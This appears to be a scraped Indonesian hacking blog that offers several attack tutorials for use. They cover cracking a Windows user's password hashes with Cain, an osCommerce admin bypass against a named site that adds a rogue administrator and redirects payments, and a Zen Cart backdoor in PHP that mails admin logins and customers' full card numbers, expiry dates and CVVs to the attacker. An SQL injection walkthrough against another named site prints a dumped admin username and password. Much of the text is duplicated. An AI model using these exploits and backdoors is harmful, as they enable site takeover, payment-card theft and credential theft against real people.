kembali dengan cain...maap nie..lagi2 craking g sniper2an ..cz ga ada bahan wat praktek *_*!
ini untuk mengingatkan plend2 sekalian cara cracking password komputer pake cain
ini khusus windows
intro:
suatu hari surjono bermain ke rumah tomo..sesampainya di rumah surjono melihat komputer tomo
"tomo..bolehkah diri ku menggunakan komputer diri mu" tanya surjono "oh tentu saja diri mu boleh menggunakan komputer diri ku..silahkan di pakai,anggap saja seperti komputer bukan punya mu" kata tomo dengan ramah
"owh..makasih ..password ya apa tom??" kata surjono yang memang komputer tomo di pasang password dan tentu saja harus memasukan passsword ketika login..
tapi tomo tidak mengatakan password nya melainkan datang kedepan komputer dan langsung mengetik password dengan ligat cepat dan tepat..
dan akhirnya komputernya bisa di pakai oleh surjono.lalu tomo pun pergi " surjono aku pergi dulu ya,,mau mendodos sawit(memanen buah sawit)" kata tomo
dan setelah beberapa lama surjono pun penasaran dengan password yang di gunakan oleh tomo.dan surjono melihat CAIN ada di komputernya jono
-------------------------
oke intro udah..berarti permasalahnya si surjono ingin mengetahui password tomo menggunakan program cain
langsung
kelebihan cain dalam hal ini
1. cain mudah dan simple
kekurangan
1.kita harus menginstal cain jika cain tidak ada di komputer korban
2.lumayan lambat jika pake brute force
3.keberhasilan tergantung pada wordlist jika menggunakan dictionary attack
langsung
1.buka cain
2.pilih CRACKER
3.pilih LM & NTLM Hashes ( di pinggir program cain)
4.klik kanan pada menu LM & NTLM Hashes
5.pilih ADD TO LIST..nah keluar pilihan ada..centang yang IMPORT hashes from local system Artinya kita mengadd username dan hash yang ada di komputer( kalo ga salah)
6.klik NEXT
7.nah keluar tuh semua password yang masih dalam bentuk hash(bener ga ni??)
8.klik kanan pada username yang mau kita crack password ya
9.keluar pilihan..pilih dictionary attack kemudian pilih NTLM hashes..mengapa?karna type ya NTLM,coba di cek di lajur TYPE
10.nah keluar tuh..kita lakukan setingan..selain As lS(password) di ilangin centangnya..jadi cuma AS lS(password) yang di centang
11.pilih ADD untuk menambah daftar text...pokoknya masukin aja dah semua kumpulan password kita..semakin banyak..semakin besar keberuntungan kita..kalo ga punya gunakan bawaan cain..letaknya di c:\program files\cain\wordlists\wordlists.txt
12.klik STARt untuk memulai penyerangan
13.kalo password komputer terdapat di wordlist kemungkinan kita akan berhasil mendapatkan password nya jika tidak berhasil berarti kita harus memperbanyak wordlist
selain cara dictionary attack masih banyak cara lain..ex brute force..silahkan di explore n di inget2 lagi di memory.
Showing posts with label Tutorial. Show all posts
Showing posts with label Tutorial. Show all posts
Tuesday, December 6, 2011
Menampilkan Pesan Sebelum Masuk Windows
Tutorial ini akan membahas cara agar pesan anda ditampilkan setiap sebelum masuk windows. pesan tersebut bisa berupa teror, ancaman dll. Korban akan panik ketika dilayar komputernya terdapat sebuah pesan yang tidak pernah ia buat. Berikut Caranya:
Cara 1
1. buka control panel.
2. klik switch to clasic view.
3. kalau sudah klik administrative tools, lalu klik Local Security Policy.
4. lalu klik Local Policies, lalu klik Security Options.
5. klik Path Interactive logon:message title for users attempting to log on atau message title for users attempting to log on .
6. lalu isikan pesan yang ingin ditampilkan.
7. klik ok, dan program tersebut sudah bisa di akses.
Cara 2
1. Buka Regedit (Klik Start, Run ,Ketikan Regedit, lalu klik ok.)
2. Masuk ke HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon .
3. Di sebelah kanan terdapat String LegalNoticeText, klik 2x dan isi dengan pesan. Untuk judul pesan isi di LegalNoticeCaption.
4. Restart komputer untuk melihat hasilnya.
Cara 3
1. Buka notepad.exe dengan mengetikan dikotak run "notepad.exe".
2. Tuliskan Skript Berikut:
Cara 1
1. buka control panel.
2. klik switch to clasic view.
3. kalau sudah klik administrative tools, lalu klik Local Security Policy.
4. lalu klik Local Policies, lalu klik Security Options.
5. klik Path Interactive logon:message title for users attempting to log on atau message title for users attempting to log on .
6. lalu isikan pesan yang ingin ditampilkan.
7. klik ok, dan program tersebut sudah bisa di akses.
Cara 2
1. Buka Regedit (Klik Start, Run ,Ketikan Regedit, lalu klik ok.)
2. Masuk ke HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon .
3. Di sebelah kanan terdapat String LegalNoticeText, klik 2x dan isi dengan pesan. Untuk judul pesan isi di LegalNoticeCaption.
4. Restart komputer untuk melihat hasilnya.
Cara 3
1. Buka notepad.exe dengan mengetikan dikotak run "notepad.exe".
2. Tuliskan Skript Berikut:
---------------Skript---------------
REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v LegalNoticeText /t Reg_SZ /d "pesan yang ingin ditampilkan" /f
REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v LegalNoticeCaption /t Reg_SZ /d "judul pesan" /f
---------------Skript--------------------
3. Save dalam bentuk file Bat (Save as, lalu klik Save type as,lalu pilih all files. Save dengan nama *.bat, misal Hx.bat)
4. Klik 2x File tersebut.
5. Restart Komputer untuk melihat hasilnya.
RUN command
Accessibility Controls = access.cpl
Accessibility Wizard = accwiz
Add Hardware Wizard = hdwwiz.cpl
Add/Remove Programs = appwiz.cpl
Administrative Tools = control admintools
Adobe Acrobat ( if installed ) = acrobat
Adobe Distiller ( if installed ) = acrodist
Adobe ImageReady ( if installed ) = imageready
Adobe Photoshop ( if installed ) = photoshop
Automatic Updates = wuaucpl.cpl
Basic Media Player = mplay32
Bluetooth Transfer Wizard = fsquirt
Calculator calc Ccleaner(if installed) = ccleaner
C: Drive = c:
Certificate Manager = cdrtmgr.msc
Character Map = charmap
Check Disk Utility = chkdsk
Clipboard Viewer = clipbrd
Command Prompt = cmd
Command Prompt = command
Component Services = dcomcnfg
Computer Management = compmgmt.msc
Compare Files = comp
Control Panel = control
Create a shared folder Wizard = shrpubw
Date and Time Properties = timedate.cpl
DDE Shares = ddeshare
Device Manager = devmgmt.msc
Direct X Control Panel ( if installed ) = directx.cpl
Direct X Troubleshooter = dxdiag
Disk Cleanup Utility = cleanmgr
Disk Defragment = dfrg.msc
Disk Partition Manager = diskmgmt.msc
Display Properties = control desktop
Display Properties = desk.cpl
Display Properties(w/Appearance Tab Preselected ) = control color
Dr. Watson System Troubleshooting Utility = drwtsn32
Driver Verifier Utility verifier Ethereal(if installed) = ethereal
Event Viewer = eventvwr.msc
Files and Settings Transfer Tool = migwiz
File Signature Verification Tool = sigverif
Findfast = findfast.cpl
Firefox = firefox
Folders Properties = control folders
Fonts = fonts
Fonts Folder = fonts
Free Cell Card Game = freecell
Game Controllers = joy.cpl
Group Policy Editor ( xp pro ) = gpedit.msc
Hearts Card Game = mshearts
Help and Support = helpctr
Hyperterminal = hypertrm
Hotline Client = hotlineclient
Iexpress Wizard = iexpress
Indexing Service = ciadv.msc
Internet Connection Wizard = icwonn1
Internet Properties = inetcpl.cpl
Internet Setup Wizard = inetwiz
IP Configuration = ipconfig /all
IP Configuration (Display DNS Cache Contents) = ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents) = ipconfig /flushdns
IP Configuration (Release All Connections) = ipconfig /release
IP Configuration (Renew All Connections) = ipconfig /renew
IP Config (Refreshes DHCP & Re-Registers DNS) = ipconfig /registerdns
IP Configuration (Display DHCP Class ID) = ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID) = ipconfig /setclassid
Java Control Panel ( if installed ) = picpl32.cpl
Java Control Panel ( if installed ) = javaws
Keyboard Properties = control keyboard
Local Security Settings = secpol.msc
Local Users and Groups = lusrmgr.msc
Logs You Out of Windows = logoff
Malicious Software Removal Tool = mrt
Microsoft Access ( if installed ) = access.cpl
Microsoft Chat = winchat
Microsoft Excel ( if installed ) = excel
Microsoft Diskpart = diskpart
Microsoft Frontpage ( if installed ) = frontpg
Microsoft Movie Maker = moviemk
Microsoft Management Console = mmc
Microsoft Narrator = narrator
Microsoft Paint = mspaint
Microsoft Powerpoint = powerpnt
Microsoft Word ( if installed ) = winword
Microsoft Syncronization Tool = mobsync
Minesweeper Game = winmine
Mouse Properties = control mouse
Mouse Properties = main.cpl
MS-Dos Editor = edit
MS-Dos FTP = ftp
Nero ( if installed ) = nero
Netmeeting = conf
Network Connections = control netconnections
Network Connections = ncpa.cpl
Network Setup Wizard = netsetup.cpl
Notepad = notepad
Nview Desktop Manager ( if installed ) = nvtuicpl.cpl
Object Packager = packager
ODBC Data Source Administrator = odbccp32
ODBC Data Source Administrator = odbccp32.cpl
On Screen Keyboard = osk
Opens AC3 Filter ( if installed )= ac3filter.cpl
Outlook Express = msimn
Paint = pbrush
Password Properties = password.cpl
Performance Monitor = perfmon.msc
Performance Monitor = perfmon
Phone and Modem Options = telephon.cpl
Phone Dialer = dialer
Pinball Game = pinball
Power Configuration = powercfg.cpl
Printers and Faxes = control printers
Printers Folder= printers
Private Characters Editor = eudcedit
Quicktime ( if installed ) = quicktime.cpl
Quicktime Player ( if installed ) = quicktimeplayer
Real Player ( if installed ) = realplay
Regional Settings = intl.cpl
Registry Editor = regedit
Registry Editor = regedit32
Remote Access Phonebook = rasphone
Remote Desktop = mstsc
Removable Storage = ntmsmgr.msc
Removable Storage Operator Requests = ntmsoprq.msc
Resultant Set of Policy ( xp pro ) = rsop.msc
Scanners and Cameras = sticpl.cpl
Scheduled Tasks control= schedtasks
Security Center = wscui.cpl
Services = services.msc
Shared Folders = fsmgmt.msc
Sharing Session = rtcshare
Shuts Down Windows = shutdown
Sounds Recorder = sndrec32
Sounds and Audio = mmsys.cpl
Spider Solitare Card Game = spider
SQL Client Configuration = clicongf
System Configuration Editor = sysedit
System Configuration Utility = msconfig
System File Checker Utility ( Scan Immediately ) = sfc /scannow
System File Checker Utility ( Scan Once At Next Boot ) = sfc /scanonce
System File Checker Utility ( Scan On Every Boot ) = sfc /scanboot
System File Checker Utility ( Return to Default Settings) = sfc /revert
System File Checker Utility ( Purge File Cache ) = sfc /purgecache
System File Checker Utility ( Set Cache Size to Size x ) = sfc /cachesize=x
System Information msinfo32 System Properties = sysdm.cpl
Task Manager = taskmgr
TCP Tester = tcptest
Telnet Client = telnet
Tweak UI ( if installed ) = tweakui
User Account Management = nusrmgr.cpl
Utility Manager utilman
Volume Serial Number for = C: label
Volume Control = sndvol32
Windows Address Book = wab
Windows Address Book Import Utility = wabmig
Windows Backup Utility ( if installed ) = ntbackup
Windows Explorer = explorer
Windows Firewall = firewall.cpl
Windows Installer Details = msiexec
Windows Magnifier = magnify
Windows Management Infrastructure = wmimgmt.msc
Windows Media Player = wmplayer
Windows Messenger = msnsgs
Windows Picture Import Wizard (Need camera connected) = wiaacmgr
Windows System Security Tool = syskey
Windows Script host settings = wscript
Widnows Updte Launches = wupdmgr
Windows Version ( shows your windows version ) = winver
Windows XP Tour Wizard = tourstart
Wordpad = write
Zoom Utility = igfxzoom
Accessibility Wizard = accwiz
Add Hardware Wizard = hdwwiz.cpl
Add/Remove Programs = appwiz.cpl
Administrative Tools = control admintools
Adobe Acrobat ( if installed ) = acrobat
Adobe Distiller ( if installed ) = acrodist
Adobe ImageReady ( if installed ) = imageready
Adobe Photoshop ( if installed ) = photoshop
Automatic Updates = wuaucpl.cpl
Basic Media Player = mplay32
Bluetooth Transfer Wizard = fsquirt
Calculator calc Ccleaner(if installed) = ccleaner
C: Drive = c:
Certificate Manager = cdrtmgr.msc
Character Map = charmap
Check Disk Utility = chkdsk
Clipboard Viewer = clipbrd
Command Prompt = cmd
Command Prompt = command
Component Services = dcomcnfg
Computer Management = compmgmt.msc
Compare Files = comp
Control Panel = control
Create a shared folder Wizard = shrpubw
Date and Time Properties = timedate.cpl
DDE Shares = ddeshare
Device Manager = devmgmt.msc
Direct X Control Panel ( if installed ) = directx.cpl
Direct X Troubleshooter = dxdiag
Disk Cleanup Utility = cleanmgr
Disk Defragment = dfrg.msc
Disk Partition Manager = diskmgmt.msc
Display Properties = control desktop
Display Properties = desk.cpl
Display Properties(w/Appearance Tab Preselected ) = control color
Dr. Watson System Troubleshooting Utility = drwtsn32
Driver Verifier Utility verifier Ethereal(if installed) = ethereal
Event Viewer = eventvwr.msc
Files and Settings Transfer Tool = migwiz
File Signature Verification Tool = sigverif
Findfast = findfast.cpl
Firefox = firefox
Folders Properties = control folders
Fonts = fonts
Fonts Folder = fonts
Free Cell Card Game = freecell
Game Controllers = joy.cpl
Group Policy Editor ( xp pro ) = gpedit.msc
Hearts Card Game = mshearts
Help and Support = helpctr
Hyperterminal = hypertrm
Hotline Client = hotlineclient
Iexpress Wizard = iexpress
Indexing Service = ciadv.msc
Internet Connection Wizard = icwonn1
Internet Properties = inetcpl.cpl
Internet Setup Wizard = inetwiz
IP Configuration = ipconfig /all
IP Configuration (Display DNS Cache Contents) = ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents) = ipconfig /flushdns
IP Configuration (Release All Connections) = ipconfig /release
IP Configuration (Renew All Connections) = ipconfig /renew
IP Config (Refreshes DHCP & Re-Registers DNS) = ipconfig /registerdns
IP Configuration (Display DHCP Class ID) = ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID) = ipconfig /setclassid
Java Control Panel ( if installed ) = picpl32.cpl
Java Control Panel ( if installed ) = javaws
Keyboard Properties = control keyboard
Local Security Settings = secpol.msc
Local Users and Groups = lusrmgr.msc
Logs You Out of Windows = logoff
Malicious Software Removal Tool = mrt
Microsoft Access ( if installed ) = access.cpl
Microsoft Chat = winchat
Microsoft Excel ( if installed ) = excel
Microsoft Diskpart = diskpart
Microsoft Frontpage ( if installed ) = frontpg
Microsoft Movie Maker = moviemk
Microsoft Management Console = mmc
Microsoft Narrator = narrator
Microsoft Paint = mspaint
Microsoft Powerpoint = powerpnt
Microsoft Word ( if installed ) = winword
Microsoft Syncronization Tool = mobsync
Minesweeper Game = winmine
Mouse Properties = control mouse
Mouse Properties = main.cpl
MS-Dos Editor = edit
MS-Dos FTP = ftp
Nero ( if installed ) = nero
Netmeeting = conf
Network Connections = control netconnections
Network Connections = ncpa.cpl
Network Setup Wizard = netsetup.cpl
Notepad = notepad
Nview Desktop Manager ( if installed ) = nvtuicpl.cpl
Object Packager = packager
ODBC Data Source Administrator = odbccp32
ODBC Data Source Administrator = odbccp32.cpl
On Screen Keyboard = osk
Opens AC3 Filter ( if installed )= ac3filter.cpl
Outlook Express = msimn
Paint = pbrush
Password Properties = password.cpl
Performance Monitor = perfmon.msc
Performance Monitor = perfmon
Phone and Modem Options = telephon.cpl
Phone Dialer = dialer
Pinball Game = pinball
Power Configuration = powercfg.cpl
Printers and Faxes = control printers
Printers Folder= printers
Private Characters Editor = eudcedit
Quicktime ( if installed ) = quicktime.cpl
Quicktime Player ( if installed ) = quicktimeplayer
Real Player ( if installed ) = realplay
Regional Settings = intl.cpl
Registry Editor = regedit
Registry Editor = regedit32
Remote Access Phonebook = rasphone
Remote Desktop = mstsc
Removable Storage = ntmsmgr.msc
Removable Storage Operator Requests = ntmsoprq.msc
Resultant Set of Policy ( xp pro ) = rsop.msc
Scanners and Cameras = sticpl.cpl
Scheduled Tasks control= schedtasks
Security Center = wscui.cpl
Services = services.msc
Shared Folders = fsmgmt.msc
Sharing Session = rtcshare
Shuts Down Windows = shutdown
Sounds Recorder = sndrec32
Sounds and Audio = mmsys.cpl
Spider Solitare Card Game = spider
SQL Client Configuration = clicongf
System Configuration Editor = sysedit
System Configuration Utility = msconfig
System File Checker Utility ( Scan Immediately ) = sfc /scannow
System File Checker Utility ( Scan Once At Next Boot ) = sfc /scanonce
System File Checker Utility ( Scan On Every Boot ) = sfc /scanboot
System File Checker Utility ( Return to Default Settings) = sfc /revert
System File Checker Utility ( Purge File Cache ) = sfc /purgecache
System File Checker Utility ( Set Cache Size to Size x ) = sfc /cachesize=x
System Information msinfo32 System Properties = sysdm.cpl
Task Manager = taskmgr
TCP Tester = tcptest
Telnet Client = telnet
Tweak UI ( if installed ) = tweakui
User Account Management = nusrmgr.cpl
Utility Manager utilman
Volume Serial Number for = C: label
Volume Control = sndvol32
Windows Address Book = wab
Windows Address Book Import Utility = wabmig
Windows Backup Utility ( if installed ) = ntbackup
Windows Explorer = explorer
Windows Firewall = firewall.cpl
Windows Installer Details = msiexec
Windows Magnifier = magnify
Windows Management Infrastructure = wmimgmt.msc
Windows Media Player = wmplayer
Windows Messenger = msnsgs
Windows Picture Import Wizard (Need camera connected) = wiaacmgr
Windows System Security Tool = syskey
Windows Script host settings = wscript
Widnows Updte Launches = wupdmgr
Windows Version ( shows your windows version ) = winver
Windows XP Tour Wizard = tourstart
Wordpad = write
Zoom Utility = igfxzoom
bypass and RCE osCommerce
Assalammualaikum wr.wb
kali ini saya menulis tutorial tentang bypas oscom biasa nya fck editor buat cms kayak ini, tapi ini beda
mungkin ada yg tau, tapi ini buat yg blom tau <-- seperti saya hahaha
langsung ke TKP saja
Cekibrott..
ex : http://www.fabulousmom.com/
cari tempat login adminnya
http://www.fabulousmom.com/catalog/admin/
lalu lakukan bypass
http://www.fabulousmom.com/catalog/admin/orders.php/ogin.php
cari letak page adminstratornya, biasanya di
administrators.php
admin_file.php
admin.php
so, jadinya
http://www.fabulousmom.com&/catalog/admin/administrators.php/login.php
lakukan insert/add new admin
http://www.fabulousmom.com/catalog/admin/administrators.php/login.php?action=new
klik kanan > view sourcec
* PERHATIKAN *
lalu rubah pada kode berikut :
<form name="administrator" action="http://www.fabulousmom.com/catalog/admin/administrators.php?action=insert" method="post">
jadi
<form name="administrator" action="http://www.fabulousmom.com/catalog/admin/administrators.php/login.php?action=insert" method="post">
==================
<input type="image" src="includes/languages/english/images/buttons/button_save.gif" border="0" alt="Save" title=" Save ">
jadi
<input type="submit" border="0" alt="Save" title=" Save " value="add" action="http://www.fabulousmom.com/catalog/admin/administrators.php/login.php?action=insert" method="post" enctype="multipart//form-data">
====================================
lalu save dengan nama rce_oscommerce.html
dan jalankan file tersebut lalu tombol add
ga terjadi apa² kan
salah sekarang tinggal login ajah dgn user dan password yg km buat di rce_oscommerce.html pada web target
trick di atas bisa juga langsung ganti alamat pp nya ma alamat pp anda
tingal ganti lokasi bypass nya /admin/module.php/login.php?set=payment
sekian dulu dari wassalammualikum wr.wb
asal mu asal dari Forum Tetangga
and mbah google
kali ini saya menulis tutorial tentang bypas oscom biasa nya fck editor buat cms kayak ini, tapi ini beda

mungkin ada yg tau, tapi ini buat yg blom tau <-- seperti saya hahaha
langsung ke TKP saja
Cekibrott..
ex : http://www.fabulousmom.com/
cari tempat login adminnya
http://www.fabulousmom.com/catalog/admin/
lalu lakukan bypass
http://www.fabulousmom.com/catalog/admin/orders.php/ogin.php
cari letak page adminstratornya, biasanya di
administrators.php
admin_file.php
admin.php
so, jadinya
http://www.fabulousmom.com&/catalog/admin/administrators.php/login.php
lakukan insert/add new admin
http://www.fabulousmom.com/catalog/admin/administrators.php/login.php?action=new
klik kanan > view sourcec
* PERHATIKAN *
lalu rubah pada kode berikut :
<form name="administrator" action="http://www.fabulousmom.com/catalog/admin/administrators.php?action=insert" method="post">
jadi
<form name="administrator" action="http://www.fabulousmom.com/catalog/admin/administrators.php/login.php?action=insert" method="post">
==================
<input type="image" src="includes/languages/english/images/buttons/button_save.gif" border="0" alt="Save" title=" Save ">
jadi
<input type="submit" border="0" alt="Save" title=" Save " value="add" action="http://www.fabulousmom.com/catalog/admin/administrators.php/login.php?action=insert" method="post" enctype="multipart//form-data">
====================================
lalu save dengan nama rce_oscommerce.html
dan jalankan file tersebut lalu tombol add
ga terjadi apa² kan

salah sekarang tinggal login ajah dgn user dan password yg km buat di rce_oscommerce.html pada web target
trick di atas bisa juga langsung ganti alamat pp nya ma alamat pp anda

tingal ganti lokasi bypass nya /admin/module.php/login.php?set=payment
sekian dulu dari wassalammualikum wr.wb
asal mu asal dari Forum Tetangga
and mbah google
Backdoring zencart
/* edit login admin /*
siapa tau admin ganti dir page login admin , kita bisa coba backdoring lagi
pasti dah pada tau :P
file yg di edit :
buat soceng customer, sapa tau ada pp nyangkut hehe :D
file yg di edit :
siapa tau admin ganti dir page login admin , kita bisa coba backdoring lagi
Codefile yg di edit :
$server = $_SERVER['SERVER_NAME'];
$referer = $_SERVER['HTTP_REFERER']; # URL page admin
$to = "yourmail@yourdomain";
$admin_name = zen_db_prepare_input($_POST['admin_name']);
$admin_pass = zen_db_prepare_input($_POST['admin_pass']);
$subject = "admin from $server";
$message = "page login = $referer \n admin = $admin_name \n pass = $admin_pass \n";
$from = "mailsender@yourdomain";
$headers = "From: $from";
mail($to,$subject,$message,$headers);
Code/* edit payment /*
http://host/[path]/[diradmin]/login.php
pasti dah pada tau :P
Code
$firstname = $order->billing['firstname'];
$lastname = $order->billing['lastname'];
$street = $order->billing['street_address'];
$city = $order->billing['city'];
$state = $order->billing['state'];
$zip = $order->billing['postcode'];
$country = $order->billing['country']['title'];
$dayphone = $order->customer['telephone'];
$ccowner = $_POST['cc_owner'];
$ccnumber = $_POST['cc_number'];
$ccexp = $_POST['cc_expires'];
$cardtype = $_POST['cc_type'];
$cvv = $_POST['cc_cvv'];
$cemail = $order->customer['email_address'];
$server = $_SERVER['SERVER_NAME'];
$message = "\n Name: $firstname $lastname \n Address: $street \n City: $city \n State: $state \n Zip: $zip \n Country: $country \n Phone: $dayphone \n email: $cemail \n cctype: $cardtype \n ccowner: $ccowner \n cc: $ccnumber \n exp: $ccexp \n cvv: $cvv \n";
file yg di edit :
/* edit create acc /*Codehttp://host/[path]/includes/modules/payment/[typepayment].php
buat soceng customer, sapa tau ada pp nyangkut hehe :D
Code
$nick = $_POST['nick'];
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$street = $_POST['street_address'];
$company = $_POST['company'];
$suburb = $_POST['suburb'];
$city = $_POST['city'];
$state = $_POST['state'];
$zip = $_POST['postcode'];
$country = $country;
$dayphone = $_POST['telephone'];
$cemail = $_POST['email_address'];
$pwd = $_POST['password'];
$dob = $_POST['dob'];
$server = $_SERVER['SERVER_NAME'];
$message = "\n nick:$nick \n Name:$firstname $lastname \n Address:$street \n company:$company \n suburb:$suburb \n City:$city \n State:$state \n Zip:$zip \n Country:$country \n Phone:$dayphone \n email:$cemail \n password:$pwd \n DOB:$dob \n";
mail("yourmail@yourdomain","Acc From $server", "$message");
file yg di edit :
Codehttp://host/[path]/includes/modules/create_account.php
SQL Injection pada X-Ice System
kali ini saya akan mencoba
mengajak anda untuk bersama-sama mengeksploitasi website yang memiliki bug SQL Injection.
Bug di X-Ice system ditemukan oleh Cyberghost beberapa hari yang lalu, tapi sampai saat ini masih banyak
vulnerability dari situs-situs yang masih bisa dimanfaatkan [red: exploitasi].
Ya, mungkin cukup sekian pengantarnya, terima kasih. Dadah…
Disini saya tidak akan menjelaskan secara detil bagaimana query didapatkan, karena butuh artikel lain
untuk membahasnya, dan saya pun masih dalam tahap pembelajaran, jadi maaf-maaf aja, tutorialnya kurang lengkap.

mengajak anda untuk bersama-sama mengeksploitasi website yang memiliki bug SQL Injection.
Bug di X-Ice system ditemukan oleh Cyberghost beberapa hari yang lalu, tapi sampai saat ini masih banyak
vulnerability dari situs-situs yang masih bisa dimanfaatkan [red: exploitasi].
Ya, mungkin cukup sekian pengantarnya, terima kasih. Dadah…
Disini saya tidak akan menjelaskan secara detil bagaimana query didapatkan, karena butuh artikel lain
untuk membahasnya, dan saya pun masih dalam tahap pembelajaran, jadi maaf-maaf aja, tutorialnya kurang lengkap.
Untuk mencari targetnya, silahkan menggunakan keyword yang tepat …
ex : inurl:/devami.asp?id= geri
ex : inurl:/devami.asp?id= geri
Korban yang saya dapatkan adalah :
http://www.radyopinarim.com/haber1/devami.asp?id=1
Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini
Yang anda dapatkan adalah kurang lebih error yang seperti ini
Microsoft OLE DB Provider for ODBC Drivers hata ’80040e14′
[Microsoft][ODBC Microsoft Access Sürücüsü] ‘id=’ sorgu ifadesi içindeki Sözdizimi hatasý (eksik iþleç)
/haber1/devami.asp, satýr 8
Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs ini.
Untuk mencari username nya anda tinggal mengganti angka 1 dengan
Untuk mencari username nya anda tinggal mengganti angka 1 dengan
-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
kurang lebih alamat di browser seperti ini :
http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,
kullaniciadi,2,3,4,5,6,7+from+admin
Yang saya dapatkan usernamenya adalah Kadrius
dan untuk mencari passwordnya
:
:
-1+union+select+0,sifre,2,3,4,5,6,7+from+admin
passwordnya adalah 19901990
Untuk login sebagai admin anda tinggal balik kehalaman
/admin/kontrol.asp
Ya, sekian saja tutorial singkat penggunaan SQL Injection sebagai exploitasi bug X-Ice system.
Selamat mencoba, terima kasih.
Selamat mencoba, terima kasih.
Subscribe to:
Posts (Atom)